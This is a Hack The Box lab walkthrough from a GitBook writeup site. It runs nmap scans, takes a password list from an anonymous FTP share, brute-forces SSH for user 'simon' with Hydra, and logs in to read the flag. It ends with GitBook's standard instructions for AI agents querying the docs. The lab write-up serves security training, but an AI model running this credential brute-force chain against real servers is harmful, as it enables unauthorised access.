> For the complete documentation index, see [llms.txt](https://ganesha-hk.gitbook.io/offensive-security-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/attacking-common-services-task-2.md).

# Attacking Common Services (task 2)

## &#x20;Skill Assessment (Medium) Walkthrough

> **HTB Module:** Attacking Common Services **Difficulty:** Medium **Goal:** Find the flag (`HTB{...}`) on the target server **Target:** inlanefreight.htb
>
> ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FD55c0FYz9fe2SGYXnsFg%2Fimage.png?alt=media\&token=0f49e7f5-474f-4f77-a546-25414270feb4) ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FcPsvhe4xvbWK5lnDhGaF%2Fimage.png?alt=media\&token=ac5f8361-7673-4638-8750-3d6ffec68948)

***

### 📌 Scenario

The second server is an **internal server** within the `inlanefreight.htb` domain that manages and stores **emails and files**, and serves as a backup for some of the company's processes. We heard it's used rarely and mostly for testing — sounds like it might be misconfigured. 👀

### 🎯 Target

```
IP     →  10.129.160.241
Domain →  inlanefreight.htb
```

### 🗺️ Attack Chain

```
Nmap → FTP anonymous login (port 30021)
  → simon's directory → mynotes.txt (password list)
    → Hydra SSH brute-force → SSH as simon → flag.txt 🏴
```

***

***

## Step 1 — Add Target to /etc/hosts

```bash
echo "10.129.160.241 inlanefreight.htb" >> /etc/hosts
```

***

## Step 2 — Nmap Scan (Quick)

Fast full port scan first to see what's open:

```bash
sudo nmap -p- --min-rate 5000 -T4 10.129.160.241
```

Interesting ports:

| Port      | Service       |
| --------- | ------------- |
| 22/tcp    | SSH           |
| 53/tcp    | DNS (domain)  |
| 110/tcp   | POP3          |
| 995/tcp   | POP3S         |
| 2121/tcp  | ccproxy-ftp   |
| 30021/tcp | unknown (FTP) |

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F8Iei1qPvvjoj2yRq7jKQ%2Fimg-000.png?alt=media&amp;token=9dec564c-3631-4f0b-b24a-8cbca200e351" alt=""><figcaption></figcaption></figure>

> 📸 **Image 1** — Nmap quick scan showing all open ports including non-standard FTP on 2121 and 30021

***

## Step 3 — Nmap Service Scan (Detailed)

Now let's hit those ports with version detection and scripts:

```bash
sudo nmap -p22,53,110,995,2121,30021 -sC -sV 10.129.160.241
```

Key findings:

| Port      | Service / Version             | Notes                           |
| --------- | ----------------------------- | ------------------------------- |
| 22/tcp    | OpenSSH 8.2p1 (Ubuntu)        | SSH target                      |
| 53/tcp    | ISC BIND 9.16.1 (Ubuntu)      | DNS                             |
| 110/tcp   | Dovecot pop3d                 | POP3 mail                       |
| 995/tcp   | Dovecot pop3d (SSL)           | POP3S mail                      |
| 2121/tcp  | ProFTPD Server (InlaneFTP)    | No anonymous login              |
| 30021/tcp | ProFTPD Server (Internal FTP) | **Anonymous login allowed!** 🎯 |

The nmap scripts also reveal a directory named `simon` on the FTP anonymous share.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F7ht3IImcXat0PtRb5VIb%2Fimg-001.png?alt=media&amp;token=08f34a4d-cc8e-49af-bffb-dc3b63f15ead" alt=""><figcaption></figcaption></figure>

> 📸 **Image 2** — Nmap service scan showing OpenSSH, BIND DNS, Dovecot POP3/POP3S, ProFTPD details

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FF7JGgdVp9Df0Wo84LPQt%2Fimg-002.png?alt=media&amp;token=102ae436-3b3f-4a01-ae22-8177e7c7d804" alt=""><figcaption></figcaption></figure>

> 📸 **Image 3** — Nmap showing two ProFTPD instances: port 2121 (InlaneFTP, no anon) and port 30021 (Internal FTP, **anonymous login allowed**, `simon` directory visible)

***

## Step 4 — FTP Anonymous Login (Port 30021)

Let's hop in as anonymous and see what simon has:

```bash
ftp 10.129.160.241 30021
# Username: anonymous
# Password: (blank / any email)
```

```
ftp> ls
drwxr-xr-x   2 ftp   ftp   4096 Apr 18  2022 simon

ftp> cd simon
ftp> ls
-rw-rw-r--   1 ftp   ftp    153 Apr 18  2022 mynotes.txt

ftp> get mynotes.txt
```

Downloaded `mynotes.txt` — it contains random strings that look like potential passwords. 💰

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FnSRrlrqc5KKQBvxumPeg%2Fimg-003.png?alt=media&amp;token=99416701-50ff-4a08-a7a4-c54cb9501404" alt=""><figcaption></figcaption></figure>

> 📸 **Image 4** — FTP anonymous login on port 30021, navigating to `simon` directory, downloading `mynotes.txt`

***

## Step 5 — SSH Brute-Force with Hydra

We've got a username (`simon`) and a password list (`mynotes.txt`). Let's spray them against SSH:

```bash
hydra -I -l simon -P mynotes.txt -f 10.129.160.241 ssh
```

**Hit!** 🎯

```
[22][ssh] host: 10.129.160.241   login: simon   password: <cracked>
```

1 valid password found!

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FYF13pGhXJuEcoApVnxG8%2Fimg-004.png?alt=media&amp;token=fff72221-217e-45f5-a136-5d926ac950bb" alt=""><figcaption></figcaption></figure>

> 📸 **Image 5** — Hydra SSH brute-force using `mynotes.txt` as password list, finding valid creds for `simon`

***

## Step 6 — SSH Login & Flag

SSH in with the creds:

```bash
ssh simon@10.129.160.241
```

We're in! Quick recon:

```bash
whoami
# simon

hostname
# lin-medium

ls
# flag.txt  Maildir

cat flag.txt
# HTB{...}
```

Flag is right in simon's home directory. 🏴

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FJlmkRUtjir5zVKfMpf6M%2Fimg-005.png?alt=media&amp;token=558cdf90-1189-4703-a4d0-f92188e1ff12" alt=""><figcaption></figcaption></figure>

> 📸 **Image 6** — SSH session as `simon` on `lin-medium`, listing home directory showing `flag.txt` and `Maildir`, reading the flag

***

## 🏆 Pwned!

Anonymous FTP access led to a password list → SSH brute-force → flag captured. Classic misconfiguration chain.

#### Tools Used

| Tool    | Purpose                              |
| ------- | ------------------------------------ |
| `nmap`  | Port scanning & service detection    |
| `ftp`   | Anonymous FTP login & file retrieval |
| `hydra` | SSH brute-force with custom wordlist |
| `ssh`   | Shell access                         |

***

> **GG 🏴** — Anonymous FTP → password list → SSH brute → flag.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/attacking-common-services-task-2.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
